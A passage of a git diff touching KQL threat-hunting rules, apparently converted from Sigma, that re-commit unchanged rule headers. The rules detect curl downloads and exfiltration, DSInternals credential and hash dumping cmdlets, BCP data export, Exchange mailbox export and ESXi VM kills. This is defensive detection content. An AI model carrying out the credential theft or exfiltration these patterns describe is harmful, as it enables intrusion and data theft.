 | where (ProcessCommandLine contains ".csv" or ProcessCommandLine contains ".dat" or ProcessCommandLine contains ".doc" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ppt" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".xls" or ProcessCommandLine contains ".xml") and ((ProcessVersionInfoOriginalFileName in~ ("wscript.exe", "cscript.exe")) or (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Execution/csexec_service_file_creation.kql b/KQL/rules/Execution/csexec_service_file_creation.kql
index 1820c971..a1b7d6fa 100644
--- a/KQL/rules/Execution/csexec_service_file_creation.kql
+++ b/KQL/rules/Execution/csexec_service_file_creation.kql
@@ -1,10 +1,10 @@
-// Title: CSExec Service File Creation
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-08-04
-// Level: medium
-// Description: Detects default CSExec service filename which indicates CSExec service installation and execution
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.t1569.002, attack.s0029
-
-DeviceFileEvents
+// Title: CSExec Service File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-04
+// Level: medium
+// Description: Detects default CSExec service filename which indicates CSExec service installation and execution
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1569.002, attack.s0029
+
+DeviceFileEvents
 | where FolderPath endswith "\\csexecsvc.exe"
\ No newline at end of file
diff --git a/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql
index 03909a9d..c0669df6 100644
--- a/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql
+++ b/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql
@@ -1,10 +1,10 @@
-// Title: Curl Web Request With Potential Custom User-Agent
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-07-27
-// Level: medium
-// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings
-// MITRE Tactic: Execution
-// Tags: attack.execution
-
-DeviceProcessEvents
+// Title: Curl Web Request With Potential Custom User-Agent
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-27
+// Level: medium
+// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings
+// MITRE Tactic: Execution
+// Tags: attack.execution
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "User-Agent:" and ProcessCommandLine matches regex "\\s-H\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql
index 5b99e218..91944e9b 100644
--- a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql
+++ b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql
@@ -1,13 +1,13 @@
-// Title: Data Export From MSSQL Table Via BCP.EXE
-// Author: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024-08-20
-// Level: medium
-// Description: Detects the execution of the BCP utility in order to export data from the database.
-// Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
-// MITRE Tactic: Execution
-// Tags: attack.execution, attack.exfiltration, attack.t1048
-// False Positives:
-// - Legitimate data export operations.
-
-DeviceProcessEvents
+// Title: Data Export From MSSQL Table Via BCP.EXE
+// Author: Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-08-20
+// Level: medium
+// Description: Detects the execution of the BCP utility in order to export data from the database.
+// Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.exfiltration, attack.t1048
+// False Positives:
+// - Legitimate data export operations.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " out " or ProcessCommandLine contains " queryout ") and (FolderPath endswith "\\bcp.exe" or ProcessVersionInfoOriginalFileName =~ "BCP.exe")
\ No newline at end of file
diff --git a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql
index b50d21a9..310d4825 100644
--- a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql
+++ b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql
@@ -1,13 +1,13 @@ -// Title: Detection of PowerShell Execution via Sqlps.exe -// Author: Agro (@agro_sev) oscd.community -// Date: 2020-10-10 -// Level: medium -// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. -// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 -// False Positives: -// - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. - -DeviceProcessEvents +// Title: Detection of PowerShell Execution via Sqlps.exe +// Author: Agro (@agro_sev) oscd.community +// Date: 2020-10-10 +// Level: medium +// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. +// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 +// False Positives: +// - Direct PS command execution through SQLPS.exe is uncommon, childprocess sqlps.exe spawned by sqlagent.exe is a legitimate action. + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql b/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql index fd2e17ce..91e634ef 100644 
--- a/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql +++ b/KQL/rules/Execution/dotnet_assembly_dll_loaded_via_office_application.kql @@ -1,10 +1,10 @@ -// Title: DotNET Assembly DLL Loaded Via Office Application -// Author: Antonlovesdnb -// Date: 2020-02-19 -// Level: medium -// Description: Detects any assembly DLL being loaded by an Office Product -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 - -DeviceImageLoadEvents +// Title: DotNET Assembly DLL Loaded Via Office Application +// Author: Antonlovesdnb +// Date: 2020-02-19 +// Level: medium +// Description: Detects any assembly DLL being loaded by an Office Product +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 + +DeviceImageLoadEvents | where FolderPath startswith "C:\\Windows\\assembly\\" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql index eaa5ea12..5f0d892e 100644 --- a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql +++ b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql 
@@ -1,13 +1,13 @@ -// Title: DSInternals Suspicious PowerShell Cmdlets -// Author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri -// Date: 2024-06-26 -// Level: high -// Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. -// The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Legitimate usage of DSInternals for administration or audit purpose. - -DeviceProcessEvents +// Title: DSInternals Suspicious PowerShell Cmdlets +// Author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri +// Date: 2024-06-26 +// Level: high +// Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. +// The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Legitimate usage of DSInternals for administration or audit purpose. 
+ +DeviceProcessEvents | where ProcessCommandLine contains "Add-ADDBSidHistory" or ProcessCommandLine contains "Add-ADNgcKey" or ProcessCommandLine contains "Add-ADReplNgcKey" or ProcessCommandLine contains "ConvertFrom-ADManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-GPPrefPassword" or ProcessCommandLine contains "ConvertFrom-ManagedPasswordBlob" or ProcessCommandLine contains "ConvertFrom-UnattendXmlPassword" or ProcessCommandLine contains "ConvertFrom-UnicodePassword" or ProcessCommandLine contains "ConvertTo-AADHash" or ProcessCommandLine contains "ConvertTo-GPPrefPassword" or ProcessCommandLine contains "ConvertTo-KerberosKey" or ProcessCommandLine contains "ConvertTo-LMHash" or ProcessCommandLine contains "ConvertTo-MsoPasswordHash" or ProcessCommandLine contains "ConvertTo-NTHash" or ProcessCommandLine contains "ConvertTo-OrgIdHash" or ProcessCommandLine contains "ConvertTo-UnicodePassword" or ProcessCommandLine contains "Disable-ADDBAccount" or ProcessCommandLine contains "Enable-ADDBAccount" or ProcessCommandLine contains "Get-ADDBAccount" or ProcessCommandLine contains "Get-ADDBBackupKey" or ProcessCommandLine contains "Get-ADDBDomainController" or ProcessCommandLine contains "Get-ADDBGroupManagedServiceAccount" or ProcessCommandLine contains "Get-ADDBKdsRootKey" or ProcessCommandLine contains "Get-ADDBSchemaAttribute" or ProcessCommandLine contains "Get-ADDBServiceAccount" or ProcessCommandLine contains "Get-ADDefaultPasswordPolicy" or ProcessCommandLine contains "Get-ADKeyCredential" or ProcessCommandLine contains "Get-ADPasswordPolicy" or ProcessCommandLine contains "Get-ADReplAccount" or ProcessCommandLine contains "Get-ADReplBackupKey" or ProcessCommandLine contains "Get-ADReplicationAccount" or ProcessCommandLine contains "Get-ADSIAccount" or ProcessCommandLine contains "Get-AzureADUserEx" or ProcessCommandLine contains "Get-BootKey" or ProcessCommandLine contains "Get-KeyCredential" or ProcessCommandLine contains 
"Get-LsaBackupKey" or ProcessCommandLine contains "Get-LsaPolicy" or ProcessCommandLine contains "Get-SamPasswordPolicy" or ProcessCommandLine contains "Get-SysKey" or ProcessCommandLine contains "Get-SystemKey" or ProcessCommandLine contains "New-ADDBRestoreFromMediaScript" or ProcessCommandLine contains "New-ADKeyCredential" or ProcessCommandLine contains "New-ADNgcKey" or ProcessCommandLine contains "New-NTHashSet" or ProcessCommandLine contains "Remove-ADDBObject" or ProcessCommandLine contains "Save-DPAPIBlob" or ProcessCommandLine contains "Set-ADAccountPasswordHash" or ProcessCommandLine contains "Set-ADDBAccountPassword" or ProcessCommandLine contains "Set-ADDBBootKey" or ProcessCommandLine contains "Set-ADDBDomainController" or ProcessCommandLine contains "Set-ADDBPrimaryGroup" or ProcessCommandLine contains "Set-ADDBSysKey" or ProcessCommandLine contains "Set-AzureADUserEx" or ProcessCommandLine contains "Set-LsaPolicy" or ProcessCommandLine contains "Set-SamAccountPasswordHash" or ProcessCommandLine contains "Set-WinUserPasswordHash" or ProcessCommandLine contains "Test-ADDBPasswordQuality" or ProcessCommandLine contains "Test-ADPasswordQuality" or ProcessCommandLine contains "Test-ADReplPasswordQuality" or ProcessCommandLine contains "Test-PasswordQuality" or ProcessCommandLine contains "Unlock-ADDBAccount" or ProcessCommandLine contains "Write-ADNgcKey" or ProcessCommandLine contains "Write-ADReplNgcKey" \ No newline at end of file diff --git a/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql b/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql index 07c258fb..2c9d2428 100644 --- a/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql +++ b/KQL/rules/Execution/enable_bpf_kprobes_tracing.kql 
@@ -1,10 +1,10 @@ -// Title: Enable BPF Kprobes Tracing -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-25 -// Level: medium -// Description: Detects common command used to enable bpf kprobes tracing -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion - -DeviceProcessEvents +// Title: Enable BPF Kprobes Tracing +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-25 +// Level: medium +// Description: Detects common command used to enable bpf kprobes tracing +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion + +DeviceProcessEvents | where (ProcessCommandLine contains "/myprobe/enable" or ProcessCommandLine contains "/myretprobe/enable") and (ProcessCommandLine contains "echo 1 >" and ProcessCommandLine contains "/sys/kernel/debug/tracing/events/kprobes/") \ No newline at end of file diff --git a/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql b/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql index 97a80aa1..9f357ea4 100644 --- a/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql +++ b/KQL/rules/Execution/enable_microsoft_dynamic_data_exchange.kql 
@@ -1,10 +1,10 @@ -// Title: Enable Microsoft Dynamic Data Exchange -// Author: frack113 -// Date: 2022-02-26 -// Level: medium -// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1559.002 - -DeviceRegistryEvents +// Title: Enable Microsoft Dynamic Data Exchange +// Author: frack113 +// Date: 2022-02-26 +// Level: medium +// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1559.002 + +DeviceRegistryEvents | where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLaunch" or RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLookup")) or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Word\\Security\\AllowDDE") \ No newline at end of file diff --git a/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql b/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql index f4bdd5fd..d0f42b99 100644 --- a/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql +++ b/KQL/rules/Execution/esxi_vm_kill_via_esxcli.kql 
@@ -1,12 +1,12 @@ -// Title: ESXi VM Kill Via ESXCLI -// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon -// Date: 2023-09-04 -// Level: medium -// Description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.impact, attack.t1059.012, attack.t1529 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: ESXi VM Kill Via ESXCLI +// Author: Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon +// Date: 2023-09-04 +// Level: medium +// Description: Detects execution of the "esxcli" command with the "vm" and "kill" flag in order to kill/shutdown a specific VM. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.impact, attack.t1059.012, attack.t1529 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains "vm process" and ProcessCommandLine contains "kill") and FolderPath endswith "/esxcli" \ No newline at end of file diff --git a/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql b/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql index 52739dd5..2d8999c7 100644 --- a/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql +++ b/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql 
@@ -1,10 +1,10 @@ -// Title: Exchange PowerShell Snap-Ins Usage -// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-03-03 -// Level: high -// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114 - -DeviceProcessEvents +// Title: Exchange PowerShell Snap-Ins Usage +// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-03-03 +// Level: high +// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114 + +DeviceProcessEvents | where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe"))) \ No newline at end of file diff --git a/KQL/rules/Execution/execute_code_with_pester_bat.kql b/KQL/rules/Execution/execute_code_with_pester_bat.kql index 1269c58c..8f44355c 100644 --- a/KQL/rules/Execution/execute_code_with_pester_bat.kql +++ b/KQL/rules/Execution/execute_code_with_pester_bat.kql 
@@ -1,12 +1,12 @@ -// Title: Execute Code with Pester.bat -// Author: Julia Fomina, oscd.community -// Date: 2020-10-08 -// Level: medium -// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 -// False Positives: -// - Legitimate use of Pester for writing tests for Powershell scripts and modules - -DeviceProcessEvents +// Title: Execute Code with Pester.bat +// Author: Julia Fomina, oscd.community +// Date: 2020-10-08 +// Level: medium +// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 +// False Positives: +// - Legitimate use of Pester for writing tests for Powershell scripts and modules + +DeviceProcessEvents | where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?")) \ No newline at end of file diff --git a/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql b/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql index 34eb88ed..3df968c6 100644 --- a/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql +++ b/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql 
@@ -1,12 +1,12 @@ -// Title: Execute Code with Pester.bat as Parent -// Author: frack113, Nasreddine Bencherchali -// Date: 2022-08-20 -// Level: medium -// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 -// False Positives: -// - Legitimate use of Pester for writing tests for Powershell scripts and modules - -DeviceProcessEvents +// Title: Execute Code with Pester.bat as Parent +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-20 +// Level: medium +// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1216 +// False Positives: +// - Legitimate use of Pester for writing tests for Powershell scripts and modules + +DeviceProcessEvents | where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) \ No newline at end of file diff --git a/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql b/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql index 4a6dfd1a..06c1acc2 100644 --- a/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql +++ b/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql 
@@ -1,12 +1,12 @@ -// Title: Execution of Powershell Script in Public Folder -// Author: Max Altgelt (Nextron Systems) -// Date: 2022-04-06 -// Level: high -// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Execution of Powershell Script in Public Folder +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-06 +// Level: high +// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "-f C:\\Users\\Public" or ProcessCommandLine contains "-f \"C:\\Users\\Public" or ProcessCommandLine contains "-f %Public%" or ProcessCommandLine contains "-fi C:\\Users\\Public" or ProcessCommandLine contains "-fi \"C:\\Users\\Public" or ProcessCommandLine contains "-fi %Public%" or ProcessCommandLine contains "-fil C:\\Users\\Public" or ProcessCommandLine contains "-fil \"C:\\Users\\Public" or ProcessCommandLine contains "-fil %Public%" or ProcessCommandLine contains "-file C:\\Users\\Public" or ProcessCommandLine contains "-file \"C:\\Users\\Public" or ProcessCommandLine contains "-file %Public%") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql b/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql index 6134260b..5567e7e9 100644 --- a/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql +++ b/KQL/rules/Execution/execution_of_script_located_in_potentially_suspicious_directory.kql 
@@ -1,10 +1,10 @@ -// Title: Execution Of Script Located In Potentially Suspicious Directory -// Author: Joseliyo Sanchez, @Joseliyo_Jstnk -// Date: 2023-06-02 -// Level: medium -// Description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: Execution Of Script Located In Potentially Suspicious Directory +// Author: Joseliyo Sanchez, @Joseliyo_Jstnk +// Date: 2023-06-02 +// Level: medium +// Description: Detects executions of scripts located in potentially suspicious locations such as "/tmp" via a shell such as "bash", "sh", etc. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains " -c " and (FolderPath endswith "/bash" or FolderPath endswith "/csh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/ksh" or FolderPath endswith "/sh" or FolderPath endswith "/zsh") and ProcessCommandLine contains "/tmp/" \ No newline at end of file diff --git a/KQL/rules/Execution/file_decryption_using_gpg4win.kql b/KQL/rules/Execution/file_decryption_using_gpg4win.kql index e39ad38d..c701334d 100644 --- a/KQL/rules/Execution/file_decryption_using_gpg4win.kql +++ b/KQL/rules/Execution/file_decryption_using_gpg4win.kql 
@@ -1,10 +1,10 @@ -// Title: File Decryption Using Gpg4win -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-09 -// Level: medium -// Description: Detects usage of Gpg4win to decrypt files -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: File Decryption Using Gpg4win +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-09 +// Level: medium +// Description: Detects usage of Gpg4win to decrypt files +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where (ProcessCommandLine contains " -d " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") \ No newline at end of file diff --git a/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql b/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql index b207198e..74fa57c8 100644 --- a/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql +++ b/KQL/rules/Execution/file_download_from_ip_url_via_curl_exe.kql 
@@ -1,10 +1,10 @@ -// Title: File Download From IP URL Via Curl.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-10-18 -// Level: medium -// Description: Detects file downloads directly from IP address URL using curl.exe -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: File Download From IP URL Via Curl.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-10-18 +// Level: medium +// Description: Detects file downloads directly from IP address URL using curl.exe +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ((ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}") and (not((ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine 
endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'"))) \ No newline at end of file diff --git a/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql b/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql index 13bb5065..c8c8fd94 100644 --- a/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql +++ b/KQL/rules/Execution/file_encryption_decryption_via_gpg4win_from_suspicious_locations.kql 
@@ -1,10 +1,10 @@ -// Title: File Encryption/Decryption Via Gpg4win From Suspicious Locations -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2022-11-30 -// Level: high -// Description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. -// MITRE Tactic: Execution -// Tags: attack.execution - -DeviceProcessEvents +// Title: File Encryption/Decryption Via Gpg4win From Suspicious Locations +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2022-11-30 +// Level: high +// Description: Detects usage of Gpg4win to encrypt/decrypt files located in potentially suspicious locations. +// MITRE Tactic: Execution +// Tags: attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains "-passphrase" and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoProductName =~ "GNU Privacy Guard (GnuPG)" or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool") and (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") \ No newline at end of file diff --git a/KQL/rules/Execution/file_encryption_using_gpg4win.kql b/KQL/rules/Execution/file_encryption_using_gpg4win.kql index 0b41139c..482ba056 100644 --- a/KQL/rules/Execution/file_encryption_using_gpg4win.kql +++ 